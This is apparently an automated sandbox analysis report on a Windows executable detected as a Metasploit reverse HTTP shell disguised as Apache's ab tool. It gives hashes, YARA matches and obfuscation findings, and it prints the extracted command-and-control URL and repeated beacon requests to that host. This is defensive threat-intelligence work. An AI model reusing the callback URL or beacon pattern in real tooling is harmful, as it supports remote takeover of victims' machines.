Windows Analysis Report
DRVf7H9j4V.exe

Overview

General Information

Sample name: DRVf7H9j4V.exe
renamed because original name is a hash value
Original sample name: ef9e66020f10a61f05bc865b167248d5.exe
Analysis ID: 1520612
MD5: ef9e66020f10a61f05bc865b167248d5
SHA1: d17d15d3234e278a6110d1f23ea3369c5c68238c
SHA256: ec8e8680522e7ecb16043670512d860de1f5ee95b7c3cadb4b6612e92a21af77
Tags: exeuser-abuse_ch
Infos:

Detection

Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: DRVf7H9j4V.exe Avira: detected
Found malware configuration
Source: DRVf7H9j4V.exe Malware Configuration Extractor: Metasploit {"Type": "Shell Reverse Http", "URL": "http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF"}
Multi AV Scanner detection for submitted file
Source: DRVf7H9j4V.exe ReversingLabs: Detection: 81%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: DRVf7H9j4V.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: DRVf7H9j4V.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb source: DRVf7H9j4V.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then xor edx, dword ptr [90909090h] 0_2_0040A430
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then push ebp 0_2_00401E39
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then sti 0_2_004056C0
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then enter FAFFh, 90h 0_2_004066E0
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then sti 0_2_004056F0
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then or dword ptr [ebx+104D8BECh], 8B08456Dh 0_2_00408680
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then xchg dword ptr [eax+21909081h], edx 0_2_004058A1
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then sti 0_2_004056B1
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then sti 0_2_0040566F
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then enter FAFFh, 90h 0_2_004067C3
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then xchg dword ptr [eax+21909081h], edx 0_2_004059A4

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 63653 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 63654 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 63655 -> 7700
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.8:49704 -> 89.197.154.115:7700
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 89.197.154.115 89.197.154.115
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VIRTUAL1GB VIRTUAL1GB
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0Host: 89.197.154.115:7700Connection: Keep-AliveCache-Control: no-cache
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp, DRVf7H9j4V.exe, 00000000.00000002.2240362748.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kq
Source: DRVf7H9j4V.exe String found in binary or memory: http://www.apache.org/
Source: DRVf7H9j4V.exe String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: DRVf7H9j4V.exe String found in binary or memory: http://www.zeustech.net/

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: DRVf7H9j4V.exe, type: SAMPLE Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 0.0.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 0.2.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_0040162C 0_2_0040162C
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_00690095 0_2_00690095
Sample file is different than original file name gathered from version info
Source: DRVf7H9j4V.exe, 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameab.exeF vs DRVf7H9j4V.exe
Source: DRVf7H9j4V.exe Binary or memory string: OriginalFilenameab.exeF vs DRVf7H9j4V.exe
Uses 32bit PE files
Source: DRVf7H9j4V.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: DRVf7H9j4V.exe, type: SAMPLE Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 0.0.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 0.2.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: DRVf7H9j4V.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.winEXE@1/0@0/1
Source: DRVf7H9j4V.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: DRVf7H9j4V.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: DRVf7H9j4V.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb source: DRVf7H9j4V.exe
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_00401877 pushad ; retf 0_2_00401A79
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_004070D9 push ebx; iretd 0_2_004070DD
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_004012DB push FFFFFFCAh; ret 0_2_00401308
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_00402779 push ebp; ret 0_2_0040277A
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_00405123 push edi; retn 0010h 0_2_00405125
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_00401527 push esi; ret 0_2_00401528
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_004055C6 push edx; ret 0_2_004055C9
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_004017D1 pushad ; retf 0_2_00401A79
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_004079EC push eax; retf 0_2_004079ED
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_00401DFC push 00401450h; iretd 0_2_00401E0A
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_00403F92 push ebp; ret 0_2_00403F9A
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_004017BC pushad ; retf 0_2_00401A79
Source: DRVf7H9j4V.exe Static PE information: section name: .text entropy: 7.017108244459124

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 63653 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 63654 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 63655 -> 7700
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe TID: 6108 Thread sleep time: -45000s >= -30000s Jump to behavior
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.0000000000777000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%%,b
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Program does not show much activity (idle)
